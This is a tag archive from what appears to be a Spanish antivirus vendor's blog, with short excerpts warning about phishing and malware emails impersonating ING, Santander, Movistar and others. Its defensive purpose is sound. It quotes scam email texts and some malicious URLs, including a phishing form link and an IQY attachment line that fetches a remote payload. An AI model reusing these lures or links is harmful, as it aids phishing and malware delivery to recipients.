Entradas con la etiqueta ‘MAILS’

SE ESTAN RECIBIENDO MAILS CON ESTAFA DE MDDP FOUNDATION

Se está recibiendo un mail que intenta capturar datos: Ya se había conocido antaño: lhttps://www.infotechnology.com/online/Cuidado-hay-una-nueva-estafa-por-mail-que-te-puede-robar-la-contrasena-20180913-0003.html pero vuelve a las andadas con este texto: TEXTO DEL MAIL ______________ La suma de $ 935300 USD ha sido ofrecida a Usted por MDDP FOUNDATION por el apoyo de la gente. alrededor tuyo. Oficial: Carling Spells Correo electrónico: office@mddpfoundation.com […]

Leer el resto de esta entrada »

Otro mail con spoofing en el remitente de correo y destinatario

Un mail que se identifica con un número, (21001132) que lo vincula a juntadeandalucia.es, contiene enlaces maliciosos a : https://ilie.formstack.com/forms/nuestra_actualizaci_n segun indicamos en cada uno de ellos:   TEXTO DEL MAIL __________________ Asunto: Notificación por correo electrónico (Tratar urgente) De: “21001132” <21001132.edu@juntadeandalucia.es> Fecha: Mie, 6 de Marzo de 2019, 7:35 pm Para: “21001132” <21001132.edu@juntadeandalucia.es> Atención: […]

Leer el resto de esta entrada »

EMPEZAMOS EL DIA CON OTRO MAIL RECIBIDO DE “ING” (FALSO POR SPOOFING, CLARO)

Se ha recibido este mail, mas de lo mismo pero con distinto texto: Asunto: nuevo documento De: “ING” <noreply@ing.es> Fecha: Mie, 6 de Marzo de 2019, 6:00 pm Para: “destinatario” ————————————————————————– Hola, Un nuevo documento está disponible en su área de clientes Para consultarlo, haga clic en el siguiente enlace: Acceda a mis documentos —> […]

Leer el resto de esta entrada »

ESTAN DE MODA LOS MAILS CON SPOOFING/PHISHING DE ING…

Volvemos a recibir otro mail con las mismas intenciones, ofrecer un enlace que conduce a una URL spoofing de ING (https://vrl.to/riml) y en ella redirigir a un página phishing de dicho banco para pedir contraseñas y demás… El texto del mail es el siguiente: ______________ Asunto: nuevo documento De: “ING” <noreply@ing.es> Fecha: Mie, 6 de […]

Leer el resto de esta entrada »

NUEVOS MAILS CUYOS FICHEROS ANEXADOS PASAMOS A CONTROLAR COMO BACKDOOR ANDROM A PARTR DEL ELISTARA 40.63 DE HOY

Se reciben dos mails, ambos anexando fichero .ISO, que desempaquetandolos se obtiene sendos .EXE, a saber: El primero tiene el siguiente texto: Asunto: Fwd: BANK TRANSFER LETTER FOR 4th payment De: Gimbrowns Marine <gimbrownm@gmail.com> Fecha: 07/02/2019 18:01 Para: destinatario Good Day. See attached Bank letter for transfer. The swift copy will be sent to you […]

Leer el resto de esta entrada »

Mails que están llegando con enlaces a páginas de captura de datos

Se están recibiendo estos días mails indicando tener pendiente de responder mensajes a los que ofrecen acceder entrando sus datos … __________ Asunto: Delivery Status Notification (Failure) De: “destinatario” Fecha: 24/11/2018 14:40 Para: destinatario You have pending messages Attention : destinatario Your Mail box failed to deliver 3 messages you sent due to scheduled upgrade […]

Leer el resto de esta entrada »

REGRESO AL PASADO: LLEGAN MAILS ANEXANDO FICHEROS CON VULNERABILIDAD CVE-2012 (CORREGIDA DESDE ANTAÑO POR MICROSOFT, PERO …)

Hoy nos ha llegado un mail anexando fichero con exploit CVE-2012 que notificamos en: NUEVO MAIL MALICIOSO ADJUNTANDO FICHERO DOC QUE ES UN RTF CON EXPLOIT CVE 2012 en el que (supuestamente) desde la India enviaban un mail anexando fichero DOC, que realmente era un RTF, que los AV identifican contener el exploit CVE 2012-0158, […]

Leer el resto de esta entrada »

Propagación de malware ADWIN (RAT) en fichero JAR anexado a mails no solicitados…

Aunque no sea nuevo, recientemente ha habido una proliferación del RAT Adwin, en un JAR anexado a mails recibidos Ver mapa de propagación: Anexados al mail se recibe un archivo JAR, cuyo desempaquetamiento y ejecución hace que el malware se auto_instale de forma automática e intente comunicarse con su servidor de comando y control. De […]

Leer el resto de esta entrada »

SIGUEN LLEGANDO MAILS PHISHING DEL BANCO DE SANTANDER

Mucho cuidado con estos mails que simulan ser del Santander, y lo que quieren es robar los datos bancarios que piden Y QUE NUNCA SE DEBEN DAR !!! El texto del mail es el siguiente: ______________ Asunto: Activar tu tarjeta ! De: =?utf-8?Q?Banco=20Santander?= <cliente@serd.es> Fecha: 26/05/2018 8:02 Para: destinatario Hola, Deseamos informarle de que tiene […]

Leer el resto de esta entrada »

NUEVOS MAILS CON TECNICAS MIME

Dos diferentes mails (que son mas de lo mismo) autoejecutan el html al utilizar formato MIME, están llegando con estos textos: Asunto: Unpaid invoice [ID:8507848] De: Anna.Cockbone@satinfo.es Fecha: 25/05/2018 16:33 Para: destinatario 8507848.iqy WEB 1 http://clodflarechk.com/2.dat 2 a 3 b 4 c 5 ANEXADO: 8507848.iqy y el segundo, muy similar, indica: Asunto: Unpaid invoice [ID:2384752] […]

Leer el resto de esta entrada »

SE ESTAN RECIBIENDO MAILS PIDIENDO DATOS

Recibimos por doble circuito los mails que indicamos a continuación: Asunto: Información de interés sobre su factura móvil De: =?UTF-8?B?TW92aXN0YXIgLSBUZWxlZsOzbmljYQ==?= <tamura@bo-tsu.co.jp> Fecha: 26/02/2018 14:17 Para: DESTINATARIO Estimado cliente, Su cuenta Movistar.es se encuentra suspendida en estos momentos , por favor asegurese de actualisar todos sus datos. Por favor, haga clic abajo para activar su cuenta. […]

Leer el resto de esta entrada »

NUEVOS MAILS QUE SE RECIBEN CONTENIENDO ENLACES A WEBS DE PROMOCION DE BITCOINS

MAS MAILS CON ENLACES MALICIOSOS Se están recibiendo mails con enlaces a una web que promociona compra de BITCOINS- El texto de dichos mails es el siguiente: Asunto: Finalmente está AQUÍ De: <dominio destinatario> Fecha: 21/02/2018 22:30 Para: <destinatario> Hola, Esto es para informarte que $13,593.97 han sido depositados en tu cuenta bancaria esta mañana. […]

Leer el resto de esta entrada »
 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies